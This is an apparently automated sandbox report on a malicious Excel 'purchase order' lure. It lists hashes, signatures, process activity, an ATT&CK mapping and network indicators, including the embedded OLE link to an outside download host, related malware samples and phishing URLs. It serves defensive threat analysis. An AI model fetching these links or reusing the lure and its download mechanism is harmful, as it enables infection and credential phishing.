
Windows Analysis Report
PURCHASE ORDER 5172025.xla.xlsx

Overview

General Information

Sample name: PURCHASE ORDER 5172025.xla.xlsx
Analysis ID: 1648273
MD5: e79caec024d0abddc288e30c2c974945
SHA1: 2e56b64b76874ae950f7d71b115fff184e0b33f3
SHA256: fb12a393e8260ef0e83bb670f86e19ce598b14bb9bbb8f90d27b573a310180f5
Tags: xla, xlsx, user-abuse_ch

Detection

Score: 48
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

Classification chart (figure): categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious.
  • System is w11x64_office
  • EXCEL.EXE (PID: 8128 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 8164 cmdline: C:\Windows\splwow64.exe 12288 MD5: 4C1F48431A4C5DE7841216C32CD98C46)
  • appidpolicyconverter.exe (PID: 2180 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • EXCEL.EXE (PID: 6620 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 162.19.137.157, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 192.168.2.27, SourceIsIpv6: false, SourcePort: 49723
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.27, DestinationIsIpv6: false, DestinationPort: 49723, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 162.19.137.157, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched


AV Detection

Source: PURCHASE ORDER 5172025.xla.xlsx | Virustotal: Detection: 28%
Source: PURCHASE ORDER 5172025.xla.xlsx | ReversingLabs: Detection: 22%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49730 version: TLS 1.2
Source: global traffic | DNS query: name: t.emobility.energy
Source: global traffic | DNS query: name: otelrules.svc.static.microsoft
Source: global traffic | TCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global traffic | TCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global traffic | TCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global traffic | TCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: excel.exe | Memory has grown: Private usage: 2MB later: 165MB
Source: Joe Sandbox View | IP Address: 13.107.246.40
Source: Joe Sandbox View | IP Address: 162.19.137.157
Source: Joe Sandbox View | JA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global traffic | HTTP traffic detected:
    GET /kqQ8bI HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: t.emobility.energy
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /404 HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: t.emobility.energy
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /rules/rule170146v0s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic | HTTP traffic detected:
    GET /rules/rule120201v19s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic | DNS traffic detected: DNS query: t.emobility.energy
Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 25 Mar 2025 16:51:10 GMT
    Server: Apache/2.4.62 (Debian)
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    X-Powered-By: Next.js
    ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
    Content-Type: text/html; charset=utf-8
    Content-Length: 4645
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
    Connection: close
Source: Primary1742921417345844900_CAB00D12-EEB3-47AC-ABAA-54A4292F3135.log.0.dr | String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1742921417345844900_CAB00D12-EEB3-47AC-ABAA-54A4292F3135.log.0.dr | String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/27140849423
Source: PURCHASE ORDER 5172025.xla.xlsx | String found in binary or memory: https://t.emobility.energy/kqQ8bIi
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: PURCHASE ORDER 5172025.xla.xlsx | OLE indicator, VBA macros: true
Source: PURCHASE ORDER 5172025.xla.xlsx | Stream path 'MBD00A6776F/\x1Ole' : https://t.emobility.energy/kqQ8bIi2hA$9vM|"|^}2.p41=M[zTE^~Ii-=AX'drG|pB'$G*zFv\xwYYnBZX"]\Hl$WJd,W|JSA/g}]ZDLbT8cadBElRx8VvN0YMsRq2C5MysO17k8FR5MTlMPUIl5Z7ICcQOArkUAfAhKc9eA4ofQFw25yA/ *~S"i%S?
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Window title found: microsoft excel okexcel cannot open the file 'purchase order 5172025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engine | Classification label: mal48.winXLSX@6/9@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$PURCHASE ORDER 5172025.xla.xlsx
Source: C:\Windows\System32\appidpolicyconverter.exe | Mutant created: PolicyMutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{CAB00D12-EEB3-47AC-ABAA-54A4292F3135} - OProcSessId.dat
Source: PURCHASE ORDER 5172025.xla.xlsx | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\appidpolicyconverter.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx"
Source: C:\Windows\System32\appidpolicyconverter.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\appidpolicyconverter.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\appidpolicyconverter.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\appidpolicyconverter.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\appidpolicyconverter.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: PURCHASE ORDER 5172025.xla.xlsx | Static file information: File size 1268224 > 1048576
Source: PURCHASE ORDER 5172025.xla.xlsx | Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: PURCHASE ORDER 5172025.xla.xlsx - Stream path 'MBD00A6776E/Package' entropy: 7.99503474609 (max. 8.0)
Source: PURCHASE ORDER 5172025.xla.xlsx - Stream path 'Workbook' entropy: 7.99545252584 (max. 8.0)
Source: C:\Windows\splwow64.exe - Window / User API: threadDelayed 967
Source: C:\Windows\splwow64.exe - Last function: Thread delayed
Source: C:\Windows\splwow64.exe - Thread delayed: delay time: 120000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE - Process information queried: ProcessInformation
MITRE ATT&CK matrix (one column per tactic; a cell prefixed with a number is a technique matched by this sample, the number being the count of matched signatures; unnumbered cells are the matrix's default placeholders):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 3 Exploitation for Client Execution | 1 Scripting | 1 Process Injection | 3 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID: 1648273; sample: PURCHASE ORDER 5172025.xla.xlsx; start date: 25/03/2025; architecture: WINDOWS; score: 48). Information recoverable from the graph:
  • Domains contacted from the start node: t.emobility.energy, star-azurefd-prod.trafficmanager.net, and 7 other IPs or domains
  • Signature on the start node: Multi AV Scanner detection for submitted file
  • Processes started from the start node: EXCEL.EXE 504 80, appidpolicyconverter.exe 1, EXCEL.EXE 23 42
  • EXCEL.EXE connects to s-part-0012.t-0009.t-msedge.net (13.107.246.40, 443, 49730, 49731; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
  • EXCEL.EXE connects to host1.emobility.energy (162.19.137.157, 443, 49723, 49724; CENTURYLINK-US-LEGACY-QWESTUS, United States)
  • EXCEL.EXE drops C:\...\~$PURCHASE ORDER 5172025.xla.xlsx (data)
  • EXCEL.EXE starts splwow64.exe 1; appidpolicyconverter.exe starts conhost.exe

Source | Detection | Scanner | Label
PURCHASE ORDER 5172025.xla.xlsx | 29% | Virustotal | -
PURCHASE ORDER 5172025.xla.xlsx | 22% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://t.emobility.energy/404 | 0% | Avira URL Cloud | safe
https://t.emobility.energy/kqQ8bIi | 0% | Avira URL Cloud | safe
https://t.emobility.energy/kqQ8bI | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0012.t-0009.t-msedge.net | 13.107.246.40 | true | false | - | high
host1.emobility.energy | 162.19.137.157 | true | false | - | high
a726.dscd.akamai.net | 23.44.136.151 | true | false | - | high
s-0005.dual-s-msedge.net | 52.123.129.14 | true | false | - | high
otelrules.svc.static.microsoft | unknown | unknown | false | - | high
t.emobility.energy | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://t.emobility.energy/404 | false | Avira URL Cloud: safe | unknown
https://t.emobility.energy/kqQ8bI | false | Avira URL Cloud: safe | unknown
https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xml | false | - | high
https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xml | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://t.emobility.energy/kqQ8bIi | PURCHASE ORDER 5172025.xla.xlsx | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.246.40 | s-part-0012.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
162.19.137.157 | host1.emobility.energy | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1648273
Start date and time: 2025-03-25 17:49:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PURCHASE ORDER 5172025.xla.xlsx
Detection: MAL
Classification: mal48.winXLSX@6/9@2/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.109.6.53, 52.109.4.7, 52.109.13.127, 52.168.117.175, 52.109.8.89, 52.168.117.168, 172.202.163.200, 52.123.129.14, 20.190.135.16, 184.31.69.3, 20.42.73.28, 23.44.136.151, 23.44.136.179
  • Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, res-1.cdn.office.net, cus-config.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, eus2-azsc-config.officeapps.live.com, officeclient.microsoft.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, c.pki.goog, assets.msn.com, ecs.office.com, fs.microsoft.com, eus-azsc-000.roaming.officeapps.live.com, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, ctldl.windowsupdate.com, onedscolprdeus19.eastus.cloudapp.azure.com, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, eus2-azsc-000.odc.officeapps.live.com, res-prod.trafficmanager.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, onedscolprdeus07.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, res.cdn.office.net, prod.odcsm1.l
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
12:51:17 | API Interceptor | 1010x Sleep call for process: splwow64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.246.40 | Payment Transfer Receipt.shtml | malicious | HTMLPhisher | www.aib.gov.uk/
13.107.246.40 | NEW ORDER.xls | malicious | Unknown | 2s.gg/3zs
13.107.246.40 | PO_OCF 408.xls | malicious | Unknown | 2s.gg/42Q
13.107.246.40 | 06836722_218 Aluplast.docx.doc | malicious | Unknown | 2s.gg/3zk
13.107.246.40 | Quotation.xls | malicious | Unknown | 2s.gg/3zM
162.19.137.157 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | -
162.19.137.157 | Untitled_20250325.docx.doc | malicious | Unknown | -
162.19.137.157 | Untitled_20250325.docx.doc | malicious | Unknown | -
162.19.137.157 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | -
162.19.137.157 | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | -
162.19.137.157 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | -
162.19.137.157 | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | -
162.19.137.157 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | -
162.19.137.157 | SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-0005.dual-s-msedge.net | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | Purchase Order 40360414.doc | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | Purchase Order 40360414.doc | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | Shitstain.exe | malicious | AnarchyGrabber, AsyncRAT, DBatLoader, Discord Token Stealer, FritzFrog, HawkEye, Lokibot | 52.123.128.14
s-0005.dual-s-msedge.net | 25 03 2025 Legal Notice Presentation.pptx | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | 25 03 2025 Legal Notice Presentation.pptx | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msg | malicious | Unknown | 52.123.129.14
host1.emobility.energy | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
host1.emobility.energy | Untitled_20250325.docx.doc | malicious | Unknown | 162.19.137.157
host1.emobility.energy | Untitled_20250325.docx.doc | malicious | Unknown | 162.19.137.157
host1.emobility.energy | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
host1.emobility.energy | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 162.19.137.157
host1.emobility.energy | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
host1.emobility.energy | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 162.19.137.157
host1.emobility.energy | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
host1.emobility.energy | SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 162.19.137.157
a726.dscd.akamai.net | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 23.44.136.185
a726.dscd.akamai.net | Purchase Order 40360414.doc | malicious | Unknown | 23.44.136.186
a726.dscd.akamai.net | Purchase Order 40360414.doc | malicious | Unknown | 23.44.136.133
a726.dscd.akamai.net | 25 03 2025 Legal Notice Presentation.pptx | malicious | Unknown | 23.44.136.179
a726.dscd.akamai.net | https://1drv.ms/o/c/8fc032da5fada757/EgEHU26Ga4FAl_1Su2lfpkUBqQItqpp0mP4_5cipPDmMcg?e=PyJVMi | malicious | Unknown | 23.44.136.155
a726.dscd.akamai.net | ProLab TT COPY for Proforma Invoice PLDS24344.docx | malicious | Unknown | 23.57.90.78
a726.dscd.akamai.net | quotation_1.xlsx | malicious | Unknown | 23.57.90.74
a726.dscd.akamai.net | Untitled_20250325.docx.doc | malicious | Unknown | 23.57.90.76
a726.dscd.akamai.net | Sales Contract_1.docx | malicious | Unknown | 23.57.90.80
a726.dscd.akamai.net | https://1drv.ms/o/s!Aij0JRNQrbnneSfOXvmQkoge4b0?e=GSyDcy | malicious | Unknown | 23.44.133.49
s-part-0012.t-0009.t-msedge.net | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.com | malicious | HTMLPhisher | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | AliareV0.1.exe | malicious | PureLog Stealer, XWorm | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msg | malicious | Unknown | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | https://x.to0wfnubykn8.ru/hjkewtr/hgjtyu.html | malicious | Unknown | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 13.107.246.40
s-part-0012.t-0009.t-msedge.net | Invoice_charles.mesquita_PaymentUpdate.html | malicious | HTMLPhisher | 13.107.246.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CENTURYLINK-US-LEGACY-QWESTUS | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
CENTURYLINK-US-LEGACY-QWESTUS | arm7.elf | malicious | Okiru | 97.112.45.135
CENTURYLINK-US-LEGACY-QWESTUS | https://promo-offer.site/tnf_pt | malicious | Unknown | 162.19.138.82
CENTURYLINK-US-LEGACY-QWESTUS | https://antiphishing.vadesecure.com/v4?f=NFZ1OXFVNUpJaXhxbWN3aw79TqTxGVr5HS_rj8xy-Dtt3WuOYgiNsT7kSrCL4neS&i=dnZZY1BRdGVud2p5a3J2MkXgKVQslibyjliaROaA9Kc&k=ylKZ&r=eVhRazAzQWpzQlVhVVRabfl7Btopt7tCs6Jhtvvo_JQliQyVoVTnThNthFfLLOv7XziSix9lmqfR7qqdZtpsOw&s=427052c2cb55a4ea4f9c70929c499bda58414514c5d12af8c66341946b20b817&u=https%3A%2F%2Fzmk5ybt5uw.us-east-1.awsapprunner.com%2F%23Xavier.Regnault%40chantiers-atlantique.com | malicious | HTMLPhisher | 162.19.59.195
CENTURYLINK-US-LEGACY-QWESTUS | Untitled_20250325.docx.doc | malicious | Unknown | 162.19.137.157
CENTURYLINK-US-LEGACY-QWESTUS | Untitled_20250325.docx.doc | malicious | Unknown | 162.19.137.157
CENTURYLINK-US-LEGACY-QWESTUS | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
CENTURYLINK-US-LEGACY-QWESTUS | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 162.19.137.157
CENTURYLINK-US-LEGACY-QWESTUS | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157
MICROSOFT-CORP-MSN-AS-BLOCKUS | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 13.107.246.40
MICROSOFT-CORP-MSN-AS-BLOCKUS | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 13.107.246.40
MICROSOFT-CORP-MSN-AS-BLOCKUS | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 13.107.246.40
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm.elf | malicious | Gafgyt, Okiru | 20.192.11.71
MICROSOFT-CORP-MSN-AS-BLOCKUS | ppc.elf | malicious | Okiru | 40.122.145.102
MICROSOFT-CORP-MSN-AS-BLOCKUS | m68k.elf | malicious | Gafgyt, Okiru | 51.120.229.61
MICROSOFT-CORP-MSN-AS-BLOCKUS | x86.elf | malicious | Okiru | 20.36.42.212
MICROSOFT-CORP-MSN-AS-BLOCKUS | 82#U0576.exe | malicious | Unknown | 40.126.29.15
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.com | malicious | HTMLPhisher | 13.107.246.72
Match | Associated Sample Name / URL | Detection | Threat Name | Context
258a5a1e95b8a911872bae9081526644 | PURCHASE ORDER 420-2025.xla.xlsx | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | quotation_1.xlsx | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | Untitled_20250325.docx.doc | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | PO#45028.xlam.xlsx | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | Nuevo comando_BR WJO-3-24-2025.xlam.xlsx | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 13.107.246.40
